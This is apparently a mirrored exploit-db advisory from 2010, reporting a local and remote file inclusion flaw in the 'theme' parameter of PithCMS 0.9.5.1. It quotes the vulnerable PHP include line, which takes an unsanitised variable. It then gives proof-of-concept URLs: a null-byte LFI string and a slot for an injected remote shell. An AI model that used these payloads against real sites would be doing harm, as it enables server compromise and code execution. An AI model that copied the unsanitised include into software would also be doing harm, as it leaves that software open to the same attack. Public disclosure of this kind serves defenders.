Pithcms – ‘theme’ Local/Remote File Inclusion - 体验盒子

作者： eidelweiss

日期： 2010-07-08

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/14271/

Title:		pithcms (theme) Local / remote File inclusion VUlnerability
Version:	0.9.5.1
download:	http://sourceforge.net/projects/pithcms/files/
Author:		eidelweiss
Contact:	g1xsystem[at]windowslive.com

=====================================================================

	-=[ CODE ]=-

include ("templates/".$theme."/index.php"); 

	-=[ P0C ]=-

	http://127.0.0.1/path/index.php?theme= [LFI]%00

	htp://127.0.0.1/path/index.php?theme= [inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=========================